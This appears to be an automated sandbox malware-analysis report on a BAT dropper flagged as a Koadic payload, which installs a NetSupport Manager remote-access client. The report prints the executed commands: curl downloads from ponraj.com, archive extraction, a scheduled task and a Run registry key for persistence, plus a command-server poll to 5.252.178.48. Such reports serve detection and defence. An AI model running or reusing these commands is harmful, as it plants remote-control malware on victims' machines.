                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.drString found in binary or memory: http://www.netsupportsoftware.com
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://www.pci.co.uk/support
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.drString found in binary or memory: http://www.pci.co.uk/supportsupport
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://www.symauth.com/cps0(
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: http://www.symauth.com/rpa00
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.dr, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: https://d.symcb.com/cps0%
                                Source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe.13.dr, PCICL32.DLL.13.dr, TCCTL32.DLL.13.dr, PCICHEK.DLL.13.dr, pcicapi.dll.13.dr, remcmdstub.exe.13.dr, HTCTL32.DLL.13.drString found in binary or memory: https://d.symcb.com/rpa0
                                Source: curl.exe, 00000007.00000002.398580764.00000287CB4A0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.398394545.00000287CB4DB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.398146790.00000287CB4DB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.398116873.00000287CB4DB000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000002.398632998.00000287CB4DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat
                                Source: curl.exe, 00000007.00000002.398580764.00000287CB4A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat-oC:
                                Source: curl.exe, 00000005.00000003.395748590.000001615B204000.00000004.00000020.00020000.00000000.sdmp, 7z.bat.0.drString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe
                                Source: curl.exe, 00000005.00000002.396342674.000001615B1E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe-oC:
                                Source: curl.exe, 00000003.00000002.393332683.0000022D39A00000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.393332683.0000022D39A07000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.392913606.0000022D39A23000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.393357483.0000022D39A3C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.392896300.0000022D39A21000.00000004.00000020.00020000.00000000.sdmp, sett.bat.0.drString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z
                                Source: curl.exe, 00000003.00000002.393332683.0000022D39A07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z-oC:
                                Source: curl.exe, 00000003.00000003.392913606.0000022D39A23000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000002.393357483.0000022D39A3C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000003.00000003.392896300.0000022D39A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z:
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: https://sectigo.com/CPS0
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
                                Source: 7zz.exe, 0000000D.00000003.402573510.0000000002285000.00000004.00000020.00020000.00000000.sdmp, putty.exe.13.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                                Source: unknownHTTP traffic detected: POST http://5.252.178.48/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.252.178.48Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknownDNS traffic detected: queries for: ponraj.com
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z HTTP/1.1Host: ponraj.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe HTTP/1.1Host: ponraj.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat HTTP/1.1Host: ponraj.comUser-Agent: curl/7.55.1Accept: */*
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49720 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 188.127.225.160:443 -> 192.168.2.5:49722 version: TLS 1.2
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,CreateFontIndirectA,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,16_2_110077A0
                                Source: 7zz.exe, 0000000D.00000002.404154806.000000000064B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,16_2_11114590
                                Source: Yara matchFile source: 24.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23c3280.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23be908.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23b6790.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23c3280.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 5692, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5792, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5660, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4712, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\PCICL32.DLL, type: DROPPED

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: tUUPQygorhzFkIcHuB.bat, type: SAMPLEMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                                Source: tUUPQygorhzFkIcHuB.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00403A7013_2_00403A70
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00417BAE13_2_00417BAE
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004442E013_2_004442E0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004285AD13_2_004285AD
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044873013_2_00448730
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044CA4013_2_0044CA40
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00454B1013_2_00454B10
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00458B3013_2_00458B30
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00450BD013_2_00450BD0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00434D2813_2_00434D28
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00460DF813_2_00460DF8
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0045105013_2_00451050
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0045917013_2_00459170
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004311FE13_2_004311FE
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044946013_2_00449460
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004514F013_2_004514F0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004217DA13_2_004217DA
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044192513_2_00441925
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0042DBB613_2_0042DBB6
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00459E7013_2_00459E70
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00461EF013_2_00461EF0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00459F8013_2_00459F80
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0045E0C013_2_0045E0C0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046A2A013_2_0046A2A0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044A44013_2_0044A440
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046A46013_2_0046A460
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044E43013_2_0044E430
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_004465E013_2_004465E0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0044A7E013_2_0044A7E0
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0045683013_2_00456830
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11029BB016_2_11029BB0
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1101C11016_2_1101C110
                                Source: C:\ProgramData\client32.exeCode function: 16_2_111640E016_2_111640E0
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1116834516_2_11168345
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1100892B16_2_1100892B
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1115F84016_2_1115F840
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1101BCD016_2_1101BCD0
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11116F3016_2_11116F30
                                Source: C:\ProgramData\client32.exeCode function: String function: 11161299 appears 31 times
                                Source: C:\ProgramData\client32.exeCode function: String function: 1105E820 appears 37 times
                                Source: C:\ProgramData\client32.exeCode function: String function: 11147060 appears 107 times
                                Source: C:\ProgramData\client32.exeCode function: String function: 11029A70 appears 315 times
                                Source: C:\ProgramData\7zz.exeCode function: String function: 0046B890 appears 376 times
                                Source: C:\ProgramData\7zz.exeCode function: String function: 00407A18 appears 130 times
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1115EA00 FindWindowA,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,16_2_1115EA00
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11113190: GetKeyState,DeviceIoControl,keybd_event,16_2_11113190
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pcihooks.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: pciinv.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\ProgramData\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\ProgramData\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Windows\System32\curl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tUUPQygorhzFkIcHuB.bat" "
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y lol.7z C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 3
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exe
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: unknownProcess created: C:\ProgramData\client32.exe "C:\ProgramData\client32.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y lol.7z C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 3
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\ProgramData\client32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                                Source: C:\ProgramData\client32.exeFile created: C:\Users\user\AppData\Local\NetSupportJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: classification engineClassification label: mal76.evad.winBAT@42/29@4/3
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1115C8E0 CoInitializeSecurity,CoCreateInstance,wsprintfW,wsprintfW,SysAllocString,wsprintfW,SysFreeString,16_2_1115C8E0
                                Source: C:\ProgramData\client32.exeFile read: C:\ProgramData\client32.iniJump to behavior
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1105A760 GetLastError,FormatMessageA,LocalFree,16_2_1105A760
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5704:120:WilError_01
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
                                Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\tUUPQygorhzFkIcHuB.bat" "
                                Source: C:\ProgramData\7zz.exeFile written: C:\ProgramData\NSM.iniJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Windows\System32\curl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\ProgramData\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\ProgramData\7zz.exeFile opened: C:\ProgramData\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658246695.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000015.00000002.412621307.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000018.00000002.433970955.000000006C191000.00000020.00000001.01000000.00000008.sdmp, client32.exe, 00000019.00000002.451224635.000000006C191000.00000020.00000001.01000000.00000008.sdmp, msvcr100.dll.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.dr
